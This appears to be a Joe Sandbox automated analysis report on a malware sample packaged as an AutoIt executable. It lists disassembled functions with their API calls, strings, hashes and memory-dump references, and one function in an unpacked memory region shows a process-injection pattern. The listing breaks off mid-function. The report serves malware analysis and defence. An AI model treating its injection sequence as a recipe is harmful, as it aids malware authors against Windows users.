Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 3e91cbc6428e63e7f6c5bf414b5d593cc1774e9552402ab1d037a1178782d704
Instruction ID: 531598c3abeeb069e3439797b14b3ec9fa8f4cb1b2abeed93587265db73ff5a4
Opcode Fuzzy Hash: 3e91cbc6428e63e7f6c5bf414b5d593cc1774e9552402ab1d037a1178782d704
Instruction Fuzzy Hash: C2211CB1D00308AFEB10DFA4EE4AFDD7BF4EB08B15F100119E504A72A1D3B56594AF94

Function 00F03633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00F036D2
KillTimer.USER32(?,00000001), ref: 00F036FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F0371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F0372A
CreatePopupMenu.USER32 ref: 00F0373E
PostQuitMessage.USER32(00000000), ref: 00F0374D

Strings

TaskbarCreated, xrefs: 00F03725

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 5c555d8d002d7e7130508cb2e7fd674c4da30ec5f23f370fcf9b2c3d79afc56a
Instruction ID: 387f2ebdbc4a9f8c1d52b01497c35aa1964dcd4f794efcfb0e06d1530dc3bc29
Opcode Fuzzy Hash: 5c555d8d002d7e7130508cb2e7fd674c4da30ec5f23f370fcf9b2c3d79afc56a
Instruction Fuzzy Hash: C8415DB390450DBBDB145F68ED0AFBD379DEB04721F500125F602D72E2CA66AD84B761

Function 00F03766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CMDLINE, xrefs: 00F03822
/AutoIt3OutputDebug, xrefs: 00F03892
/AutoIt3ExecuteLine, xrefs: 00F038A7
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00F037AE
/ErrorStdOut, xrefs: 00F0387D
CMDLINERAW, xrefs: 00F037FB
/AutoIt3ExecuteScript, xrefs: 00F038BC

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 690187d1bc1b6e6e23ba5d4c7ed24b371c0374e3d07911cfc52f0ca6b6649096
Instruction ID: 1184813ff4ab2538fb01343121c1b3ddd35e902c08831e1316ebec6718ffd5e3
Opcode Fuzzy Hash: 690187d1bc1b6e6e23ba5d4c7ed24b371c0374e3d07911cfc52f0ca6b6649096
Instruction Fuzzy Hash: 1FA14D7291422D9ACB04EBA0DC51EEEB7B9BF14710F440529F415A71D2EF78AA08FB60

Function 018F52D0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 018F53A1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 018F55C7

Memory Dump Source

Source File: 00000000.00000002.1350674871.00000000018F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 018F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f2000_k9OEsV37GE.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction ID: 6b1aef466fefd95efb485f4735d32a78ea431a1401192bf536509878d8be0ff5
Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction Fuzzy Hash: 1DA1F970E00209EBDB14CFA8C898BEEBBB5FF58305F208159E601FB281D7759A41CB95

Function 00F039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F03A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F03A24
ShowWindow.USER32(00000000,?,?), ref: 00F03A38
ShowWindow.USER32(00000000,?,?), ref: 00F03A41

Strings

edit, xrefs: 00F03A1E
AutoIt v3, xrefs: 00F039FB, 00F03A00, 00F03A01

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 70947a76fe6d76015a330c59b43c1b23d1892c2d8929021259633878bad810a8
Instruction ID: 6fb12ae3b9880badcbeb779eace3f582255d0259b2d9816d06ed3c16bf5f1fdb
Opcode Fuzzy Hash: 70947a76fe6d76015a330c59b43c1b23d1892c2d8929021259633878bad810a8
Instruction Fuzzy Hash: 5CF03A705002987EEB305763AC4AEBB3EBDD7C7F50B00002AB900E3170C2752881EAB0

Function 018F5080 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 018F4F70: Sleep.KERNELBASE(000001F4), ref: 018F4F81

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 018F51C1

Strings

CU77X71M6XJXE7E, xrefs: 018F5224, 018F5227

Memory Dump Source

Source File: 00000000.00000002.1350674871.00000000018F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 018F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f2000_k9OEsV37GE.jbxd

Similarity

API ID: CreateFileSleep
String ID: CU77X71M6XJXE7E
API String ID: 2694422964-2712797749
Opcode ID: 6afcaa85787beed07bef83790808475b92ed3a464072a107240f18368b04cb7e
Instruction ID: 35245d9d07c5c1719533eb7252e91bda9efe494f06367adb944fd08c0a7aa249
Opcode Fuzzy Hash: 6afcaa85787beed07bef83790808475b92ed3a464072a107240f18368b04cb7e
Instruction Fuzzy Hash: 7D516034D04248DBEF11DBA8D814BEEBB79AF18704F104199E619BB2C0D77A1B45CB65

Function 00F0407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F3D3D7

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

_memset.LIBCMT ref: 00F040FC
_wcscpy.LIBCMT ref: 00F04150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F04160

Strings

Line: , xrefs: 00F3D400

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 5f656a1b1db69d236c5ed94a5b107ec5d2f870053961b222b8d305de125a5305
Instruction ID: bdd35a760a4f6a5367dd3291a817ba16ecfd74a70fb0f671bcbad50305a0b748
Opcode Fuzzy Hash: 5f656a1b1db69d236c5ed94a5b107ec5d2f870053961b222b8d305de125a5305
Instruction Fuzzy Hash: 6531B2B2408305AED721EB60EC46FDB77D8AF84714F10451AF685930D1EB74B648F792

Function 00F0686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F04DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00FC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F04E0F

_free.LIBCMT ref: 00F3E263
_free.LIBCMT ref: 00F3E2AA

Part of subcall function 00F06A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F06BAD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00F3E039
Bad directive syntax error, xrefs: 00F3E292

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 84262c0edffe36b7f808d4fcb2a0471ed3852824f0138039b252c1bf81bd2a91
Instruction ID: 47b7c65a64cb9e5c672be8fbd54e7a0fcfa339971d116b81297d49f4df54a0ba
Opcode Fuzzy Hash: 84262c0edffe36b7f808d4fcb2a0471ed3852824f0138039b252c1bf81bd2a91
Instruction Fuzzy Hash: 1D915C71D04219AFCF04EFA4CC919EEB7B8FF14320F14446AE815AB2E1DB78A955EB50

Function 00F035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00F035A1,SwapMouseButtons,00000004,?), ref: 00F035D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00F035A1,SwapMouseButtons,00000004,?,?,?,?,00F02754), ref: 00F035F5
RegCloseKey.KERNELBASE(00000000,?,?,00F035A1,SwapMouseButtons,00000004,?,?,?,?,00F02754), ref: 00F03617

Strings

Control Panel\Mouse, xrefs: 00F035D2

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 08f83db2f1705d72b9ad0af17479e0ab32cb73145b7d4f76d35bc8be5e6d713f
Instruction ID: 489fb4fa2813a144f41ddc0093fe097a95cf3bc10a380b85a5aa54c51d37f909
Opcode Fuzzy Hash: 08f83db2f1705d72b9ad0af17479e0ab32cb73145b7d4f76d35bc8be5e6d713f
Instruction Fuzzy Hash: F5114571A10208BFDB208F64DC80EFEBBBCEF04750F108469E805D7250E6729E44BBA0

Function 018F3F70 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 018F472B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018F47C1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018F47E3

Memory Dump Source

Source File: 00000000.00000002.1350674871.00000000018F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 018F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f2000_k9OEsV37GE.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 6e999cef06aac06fcde311c2673bbf8567a4d88a660ea8880241fb15dada5407
Instruction ID: 5fda7ff9fd45976e758f209e670ebd54021ca4d1055b48e593da33213766221a
Opcode Fuzzy Hash: 6e999cef06aac06fcde311c2673bbf8567a4d88a660ea8880241fb15dada5407
Instruction Fuzzy Hash: ED620A30A142589BEB24CFA4C850BDEB776EF58300F1091A9D20DEB390E7769E85CB59

Function 00F6955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00F04EE5: _fseek.LIBCMT ref: 00F04EFD

Part of subcall function 00F69734: _wcscmp.LIBCMT ref: 00F69824
Part of subcall function 00F69734: _wcscmp.LIBCMT ref: 00F69837

_free.LIBCMT ref: 00F696A2
_free.LIBCMT ref: 00F696A9
_free.LIBCMT ref: 00F69714

Part of subcall function 00F22D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00F29A24), ref: 00F22D69
Part of subcall function 00F22D55: GetLastError.KERNEL32(00000000,?,00F29A24), ref: 00F22D7B

_free.LIBCMT ref: 00F6971C

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
Instruction ID: fae0ec8dfe3b05ab19cc30b9723e8cd068ba4c601bdabadac110cf220a413f90
Opcode Fuzzy Hash: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
Instruction Fuzzy Hash: FC516FB1D04219AFDF249F64DC81A9EBBB9FF48300F10449EF609A3241DB756A90DF58

Function 00F2470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F247A0
__flush.LIBCMT ref: 00F247C0
__write.LIBCMT ref: 00F247F3
__flsbuf.LIBCMT ref: 00F24821

Part of subcall function 00F28B28: __getptd_noexit.LIBCMT ref: 00F28B28

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 7054826a5d8072f43ffe1cdc753b55d8339624de99b8bd1705c8dfff0e199428
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 2841C675F00B669BDB18CF69E8809AE7BA5EF45370B24813DE825C7640D7B4ED41AB40

Function 00F044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F044CF

Part of subcall function 00F0407C: _memset.LIBCMT ref: 00F040FC
Part of subcall function 00F0407C: _wcscpy.LIBCMT ref: 00F04150
Part of subcall function 00F0407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F04160

KillTimer.USER32(?,00000001,?,?), ref: 00F04524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F04533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F3D4B9

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 7d99dbf530853ff052ff50fc302d723af6868eee47f5b7f241ed655538c69560
Instruction ID: 47f7a4de96bca5da0e4dbcf45e4dc96beda907a2987f82ca266e236e4970af39
Opcode Fuzzy Hash: 7d99dbf530853ff052ff50fc302d723af6868eee47f5b7f241ed655538c69560
Instruction Fuzzy Hash: 5D21B6B1904794AFE732CB24DC55BF6BBEC9B05328F14009DE79A57181C3742988B751

Function 00F07285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F3EA39
GetOpenFileNameW.COMDLG32(?), ref: 00F3EA83

Part of subcall function 00F04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F04743,?,?,00F037AE,?), ref: 00F04770

Part of subcall function 00F20791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F207B0

Strings

X, xrefs: 00F3EA51

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 73a74ca36a64cb9adfccfa7c7eae0778784098e877bd398fca840325bff83dd4
Instruction ID: b30a26fa5108ee5867fca334262af44d818149ffc3aa4843f038df9f9efd91f6
Opcode Fuzzy Hash: 73a74ca36a64cb9adfccfa7c7eae0778784098e877bd398fca840325bff83dd4
Instruction Fuzzy Hash: CA21A171A002589BCF41DF94DC45BEE7BF8AF48710F004059E408AB282DBB86989EFA1

Function 00F698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00F698F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F6990F

Strings

aut, xrefs: 00F69909

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: dcbbbd1d5e98b3abcb38d1acedd1517c18ca1d960cd83499da05c33debe92653
Instruction ID: b3ad8a387509dd7189f50b6510d1b63ca49c093832b0226fe1099efbe38ea839
Opcode Fuzzy Hash: dcbbbd1d5e98b3abcb38d1acedd1517c18ca1d960cd83499da05c33debe92653
Instruction Fuzzy Hash: E0D05E7958030DAFDB509BA0DC0EFEA773CE704700F0002B1BA54D10A1EAB095999B91

Function 00F7CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f03d0aac37e0488f09e6f078075df77113bc35a6aa81837d36d96c843dfddab
Instruction ID: 8a20ef29cf389603d19f40ed06adcd6f61f44a907bba0afa65a8147ad5c4523a
Opcode Fuzzy Hash: 5f03d0aac37e0488f09e6f078075df77113bc35a6aa81837d36d96c843dfddab
Instruction Fuzzy Hash: 5BF14C71A083019FC714DF28C880A6ABBE5FF88324F54892EF8999B351D774E945DF92

Function 00F0F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F20162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F20193
Part of subcall function 00F20162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F2019B
Part of subcall function 00F20162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F201A6
Part of subcall function 00F20162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F201B1
